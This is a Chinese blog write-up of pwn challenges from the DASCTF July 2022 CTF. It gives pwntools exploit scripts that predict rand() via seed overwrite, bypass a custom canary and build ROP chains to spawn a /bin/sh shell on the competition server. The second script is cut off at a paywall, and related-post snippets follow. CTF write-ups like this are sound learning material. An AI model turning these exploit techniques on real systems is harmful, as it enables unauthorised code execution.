DASCTF 7月赋能赛pwn wp

原创 已于 2022-07-25 14:37:09 修改 · 613 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ubuntu #linux #python

于 2022-07-25 14:37:06 首次发布
本文分享了pwn技术在MyCanary2、compact和easyheap三个挑战中的应用,包括利用buf覆盖、栈溢出、canary绕过、堆结构操作和free_hook利用等高级技巧,展示了如何通过精心构造payload获取shell。

pwn

eyfor

1

buf可以覆盖seed,覆盖之后直接可以生成随机数。猜数成功之后可以进入一个栈溢出:

程序自带system函数,同时会将payload strcpy到bss段上,因此可以在payload中附带/bin/sh之后直接调用system(“/bin/sh”)

getshell。

exp:

from pwn import *
import ctypes
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
libc_func = ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc_func.srand(10)
sh = process('/mnt/hgfs/ubuntu/das7/pwn4')
sh = remote('node4.buuoj.cn',27445)
sh.sendafter(b'go\n',b'aaa')
for i in range(4):
    sh.sendlineafter(b'message:\n',str(libc_func.rand()).encode())
sh.sendline(str(-1).encode())
pop_rdi  = 0x0000000000400983
# gdb.attach(sh)
payload = b'/bin/sh\x00'+b'a'*0x30+p64(pop_rdi+1)+p64(pop_rdi)+p64(0x6010C0)+p64(0x400680)

sh.sendline(payload)
sh.interactive()

MyCanary2

2

程序自己实现一个canary,canary本身是通过随机数异或而来,不可破解。

不过程序出现了一个逻辑漏洞。

若我们先调用栈溢出之后再调用生成canary则可以直接绕过canary 实现栈溢出。

exp:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r  = process('/mnt/hgfs/ubuntu/das7/MyCanary2/MyCanary2')
r  = remote('node4.buuoj.cn',28879)


def menu(choice):
    r.recvuntil(b"Input your choice")
    r.sendline(str(choice))

def gogogo(payload):
    menu(1)
    r.recvuntil(b"Show me the code:")
    r.send(payload)


pop_rdi = 0x0000000000401613
system_addr = 0x401120
payload = b'a'*0x68+p32(0)+p32(0)+p64(0)+p64(pop_rdi+1)+p64(pop_rdi)+p64(0x4020F0)+p64(system_addr)
print(payload)
# gdb.attach(r)
gogogo(payload) 
menu(2)
menu(
最低0.47元/天 解锁文章
DASCTF2022 7月 crypto wpDASCTF2022.07Pwn easyheap)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 663
文章目录DASCTF2022 7月 crypto wp sigin ezNTRU NTRURSA
2021 DASCTF Sept X 浙江工业大学秋季挑战 pwn hahapwn
yongbaoii的博客
09-27 324
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF 7月部分pwn
starssgo的博客
07-25 1631
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
DASCTF2022.07 - Pwn easyheap
qq_34010404的博客
07-25 1778
DASCTF 2022.07
pwnDASCTF Sept 九月
woodwhale的博客
09-26 3833
pwnDASCTF Sept 月 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF七月-web
Pr0m1se1n的博客
08-06 974
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
DASCTF X GFCTF 2022十月挑战 - pwn
z1r0的博客
10-28 1025
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF9月pwn-wp
Stella_Leo的博客
09-28 1720
DASCTF-2021-9月 头一次打安恒月,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
DASCTF 2023六月挑战|二进制专项 PWN (下)
susu_xiaosu的博客
07-23 2009
【代码】DASCTF 2023六月挑战|二进制专项 PWN (下)
DASCTF&BJDCTF 3rd 三道PWN题复现
weixin_44145820的博客
06-21 996
最近看了一下上次安恒五月没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
DASCTF 2023六月挑战|二进制专项 PWN
weixin_51890658的博客
06-05 565
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF 2023六月挑战|二进制专项 PWN (上)
susu_xiaosu的博客
07-22 483
【代码】DASCTF 2023六月挑战|二进制专项 PWN (上)
DASCTF2024八月-pwn部分题解
最新发布
qq_41683953的博客
08-24 848
DASCTF2024八月开学季,PWN,clock,randArray
[DASCTF 2023六月挑战|二进制专项] 5个pwn
weixin_52640415的博客
06-04 2023
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2020安恒月 4月 pwn1---echo server题解
qy201706的博客
05-08 1225
学到了利用printf泄露libc,以前都只会puts… 0x1 checksec: 0x2 拖进ida: 显然进入sub_4006A7(): 厉害了自定义写入长度,明显的栈溢出 0x88个’a’可覆盖返回地址: 0x3 无system、’/bin/sh’ 泄露libc来做 0x4 printf泄露地址的详解(选择泄露__libc_start_main): 不知道ROP链怎么写,直接去程序里找汇编代码现学!! 发现程序最后的printf(“hello %s”, &s); 到g
2021dasctf七月 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 1201
前言:算是第一次参加自己觉得能力匹配的比之前的0ctf,tctf的,感觉自己就像个混子,2021国参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比嘛,总归是不可能会做的,不过也算是知道了,比也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 387
此题是7月末的比,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
Pwnwp
weixin_52553215的博客
11-22 1013
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
susu_xiaosu的博客
07-08 1080
【代码】DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
AI技术能下的三种课堂学习模式
资源摘要信息: "AI能的课堂三种学习方式共3页.pdf-文档整理可打印" 该文档标题暗示其内容是关于利用人工智能(AI)技术对传统课堂学习方式的能,具体关注点在于三种不同的学习方式。文档共包含三页内容,并且...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值